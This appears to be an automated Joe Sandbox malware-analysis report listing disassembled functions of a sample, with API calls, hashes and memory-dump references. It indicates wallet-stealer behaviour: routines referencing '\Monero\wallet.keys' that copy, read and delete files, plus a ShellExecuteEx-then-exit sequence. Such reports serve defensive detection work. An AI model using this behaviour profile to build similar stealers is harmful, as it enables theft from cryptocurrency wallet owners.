                  • Instruction Fuzzy Hash: 0341B6B6D102086BDB24EBA0DC46FFE733DAF98300F404968B71556181EA759B9D8FD2
                  Function 002F7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002F7E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F7E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,0131B968,00000000,00020119,?), ref: 002F7E5E
                  • RegQueryValueExA.ADVAPI32(?,0132E798,00000000,00000000,000000FF,000000FF), ref: 002F7E7F
                  • RegCloseKey.ADVAPI32(?), ref: 002F7E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 02a1ff610646ed627ac098c575aa5f980db6114820a944f7508f3c8f3ab87c24
                  • Instruction ID: 118e3b19a34b0b67876e73d63b380c0895a862af4e9a1dbdb9d0fc183df1af49
                  • Opcode Fuzzy Hash: 02a1ff610646ed627ac098c575aa5f980db6114820a944f7508f3c8f3ab87c24
                  • Instruction Fuzzy Hash: 5A119EB1A54209EBD714CF94DD4AFBBFBB8FB09B10F10412AF705A7280D7B458059BA1
                  Function 002F9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                  Download Yara Rule
                  APIs
                  • StrStrA.SHLWAPI(0132E8D0,?,?,?,002F140C,?,0132E8D0,00000000), ref: 002F926C
                  • lstrcpyn.KERNEL32(0052AB88,0132E8D0,0132E8D0,?,002F140C,?,0132E8D0), ref: 002F9290
                  • lstrlen.KERNEL32(?,?,002F140C,?,0132E8D0), ref: 002F92A7
                  • wsprintfA.USER32 ref: 002F92C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: e9a3fb31c798dc4fdddc9e0845e17902bed424ecc98a189684f73dbcd68cbec0
                  • Instruction ID: c400e37f1d6a7608990acb8ac2a6fbd043e095bcec7a037cb9ebc763796aec21
                  • Opcode Fuzzy Hash: e9a3fb31c798dc4fdddc9e0845e17902bed424ecc98a189684f73dbcd68cbec0
                  • Instruction Fuzzy Hash: CD011675500208FFCB04DFECD988EAE7BB9FF59390F148148F90A8B240C631AA51EB91
                  Function 002E12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002E12B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002E12BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 002E12D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 002E12F5
                  • RegCloseKey.ADVAPI32(?), ref: 002E12FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 0fabd9a132a9fca96e080439c542363a6d23384472bceb615bb9605afb55c409
                  • Instruction ID: 86fd21f56cf6f5621acd70a0dec3eb463ea7caa53d22d48378d0bd5f148894ba
                  • Opcode Fuzzy Hash: 0fabd9a132a9fca96e080439c542363a6d23384472bceb615bb9605afb55c409
                  • Instruction Fuzzy Hash: D60131B9A40208BBDB14DFE0DC49FAEB7B8FF48701F008159FB0597280D6719A059F51
                  Function 002FC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Type
                  • String ID:
                  • API String ID: 2109742289-3916222277
                  • Opcode ID: b21ec9e152263f412f050398221bd7a6452436c9669071e87d03a82cf6d31205
                  • Instruction ID: 1ba675930aa4473565bfc228e5a53f5fff498fc41f87ab128b378ac01597b2c5
                  • Opcode Fuzzy Hash: b21ec9e152263f412f050398221bd7a6452436c9669071e87d03a82cf6d31205
                  • Instruction Fuzzy Hash: C441E77111075C5EDB228B24CD94FFBFBED9F45784F2444F8EACA86182D2B19A548F20
                  Function 002F6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 002F6663
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002F6726
                  • ExitProcess.KERNEL32 ref: 002F6755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: 4498cb81a87ec2f66ee8117dac76ac84cea6c0b7fe89aa5497bdecebeeac8ab6
                  • Instruction ID: 8e327186a4716a97df5ade5349232f6dc0095a32a8d7a3ed0e3455d39c52d939
                  • Opcode Fuzzy Hash: 4498cb81a87ec2f66ee8117dac76ac84cea6c0b7fe89aa5497bdecebeeac8ab6
                  • Instruction Fuzzy Hash: 03314DF1811208ABDB14EB50DC92FEEB778AF14340F4041A8F30A66191DFB46B59CF5A
                  Function 002F87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00300E28,00000000,?), ref: 002F882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F8836
                  • wsprintfA.USER32 ref: 002F8850
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: 4791eeb406fb379cc70cda1ae93c45297315baec5292687da64559513b86bff6
                  • Instruction ID: 7971ee4ad42bb487d412d08757563088fbd13fedcef6d19de8bab0a0a4d33e40
                  • Opcode Fuzzy Hash: 4791eeb406fb379cc70cda1ae93c45297315baec5292687da64559513b86bff6
                  • Instruction Fuzzy Hash: 98214FB1E40208AFDB14DF94DD49FAEBBB8FF49701F104119F605A7280C779A905DBA1
                  Function 002F8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,002F951E,00000000), ref: 002F8D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F8D62
                  • wsprintfW.USER32 ref: 002F8D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: f0f3da9d7a3ba86a29d9eaf8a72f59868f1f5488ab562c2b3825b5e772d80b66
                  • Instruction ID: 8af2219e635ef5163c4116e1462c7c03bb647f673c8c68dcb5ae0c4ae5002348
                  • Opcode Fuzzy Hash: f0f3da9d7a3ba86a29d9eaf8a72f59868f1f5488ab562c2b3825b5e772d80b66
                  • Instruction Fuzzy Hash: CAE08CB1A40208BBE724DB94DC0AE6977B8EF06702F004094FE0997280DA719E05AB96
                  Function 002EA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002F8B60: GetSystemTime.KERNEL32(00300E1A,01329C18,003005AE,?,?,002E13F9,?,0000001A,00300E1A,00000000,?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002F8B86
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002EA2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 002EA3FF
                  • lstrlen.KERNEL32(00000000), ref: 002EA6BC
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 002EA743
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 5c447a622320d0d947c307d204261b96bd969a6301f0e771c155c05a34d2c66f
                  • Instruction ID: cd42ac05c00dbbfff6009b6d7ac258a76b3793789e32d51bf6f75aff2fa58c30
                  • Opcode Fuzzy Hash: 5c447a622320d0d947c307d204261b96bd969a6301f0e771c155c05a34d2c66f
                  • Instruction Fuzzy Hash: 60E1B2B282010C9ADB15EBA4DD52DFEB338AF14780F508175F61B66091DE706A5DCF62
                  Function 002ED400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002F8B60: GetSystemTime.KERNEL32(00300E1A,01329C18,003005AE,?,?,002E13F9,?,0000001A,00300E1A,00000000,?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002F8B86
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002ED481
                  • lstrlen.KERNEL32(00000000), ref: 002ED698
                  • lstrlen.KERNEL32(00000000), ref: 002ED6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 002ED72B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: c8482f8eccf58c505eadbba1bc4c698fed6d079f2f100538a12e887e836dff36
                  • Instruction ID: 84889ef8523ffd6ede2df7ed1180529305ba0187d4caa44957b4adc30e8974ec
                  • Opcode Fuzzy Hash: c8482f8eccf58c505eadbba1bc4c698fed6d079f2f100538a12e887e836dff36
                  • Instruction Fuzzy Hash: 1691DFB18201089BDB14EBA4DD56DFEB338AF14780F508178F61B66091EF746A29CF62
                  Function 002ED780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002F8B60: GetSystemTime.KERNEL32(00300E1A,01329C18,003005AE,?,?,002E13F9,?,0000001A,00300E1A,00000000,?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002F8B86
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002ED801
                  • lstrlen.KERNEL32(00000000), ref: 002ED99F
                  • lstrlen.KERNEL32(00000000), ref: 002ED9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 002EDA32
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
